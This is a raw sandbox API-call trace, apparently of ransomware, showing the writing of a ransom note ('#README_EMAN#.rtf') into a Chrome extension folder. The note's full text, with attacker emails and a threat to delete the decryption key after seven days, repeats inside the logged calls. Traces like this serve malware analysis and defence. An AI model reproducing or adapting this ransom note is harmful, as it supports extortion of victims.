\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.744] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.745] CloseHandle (hObject=0x228) returned 1 [0284.745] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0284.745] GetLastError () returned 0x2 [0284.745] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 